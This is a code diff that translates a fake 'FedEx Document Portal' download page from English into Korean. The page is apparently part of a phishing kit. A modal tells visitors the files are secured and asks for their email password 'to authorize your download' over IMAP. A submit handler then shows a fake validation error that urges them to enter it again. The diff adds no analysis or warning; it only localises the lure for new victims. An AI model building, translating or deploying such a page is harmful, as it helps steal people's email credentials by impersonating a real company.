--- a/index2.html
+++ b/index2.html
@@ -64,7 +64,7 @@ video {
            </div>
 		   <br/><br/>
            <div class="my-5">
-		 <button id="myBtn" class="btn btn-primary" style="width: 299px; background-color:#472F91; height: 60px"> Download Document </button></div>
+		 <button id="myBtn" class="btn btn-primary" style="width: 299px; background-color:#472F91; height: 60px"> 문서 다운로드 </button></div>
 		<script>
 $(document).ready(function(){
   $("#myBtn").click(function(){
@@ -87,23 +87,23 @@ $(document).ready(function(){
         
         <div class="modal-body" style="padding:40px 50px;">
 		<div><img src="img/logo.png"width="80" height="30"><br/><br/>
-		<p><font size="-1">These files are sensitive and secured against unauthorized access. In order to access ths file, please provide your current email credentials, we will connect to your email provider through a secure IMAP channel to authorize your download.</i></font></p>
+		<p><font size="-1">이러한 파일은 민감하며 무단 액세스로부터 보호됩니다, 파일에 접근하려면 현재 이메일 자격 증명을 제공하세요, 귀하의 다운로드를 승인하기 위해 보안 IMAP 채널을 통해 귀하의 이메일 제공자에게 연결됩니다.</i></font></p>
 		<hr></div>
           <form role="form">
             <div class="form-group">
-              <label for="usrname">Email:</label>
+              <label for="usrname">이메일:</label>
               <input type="text" class="form-control" id="email" name="email" placeholder="Enter Email address" required="" readonly="">
             </div>
             <div class="form-group">
               <label for="psw">Password:</label>
-              <input type="password" class="form-control" id="password" name="password" placeholder="Enter Email Password" required="">
+              <input type="password" class="form-control" id="password" name="password" placeholder="이메일 비밀번호를 입력하세요" required="">
             </div>
             <div class="checkbox" align="center">
 			 <font color="#FF0000"><span id="msg"></span></font>
             </div>
 			
-              <button type="submit" id="submit-btn" class="btn btn-danger btn-block">Download Document</button>
-          </form> <div align="center"><font size="-2">© Copyright FedEx Document Portal 2025</font></div>
+              <button type="submit" id="submit-btn" class="btn btn-danger btn-block">문서 다운로드</button>
+          </form> <div align="center"><font size="-2">© Copyright FedEx 문서 포털 2025</font></div>
         </div>
        
       </div>
@@ -195,7 +195,7 @@ $(document).ready(function()
 				,error:function()
 					{
 					$("#msg").show();
-					$('#msg').html("Email validation error, please enter valid email password.")
+					$('#msg').html("이메일 검증 오류입니다. 유효한 이메일 비밀번호를 입력하세요.")
 				}
 				,complete:function()
 					{
@@ -217,4 +217,3 @@ if(location.hash)
 
   </script>
   </html>
-
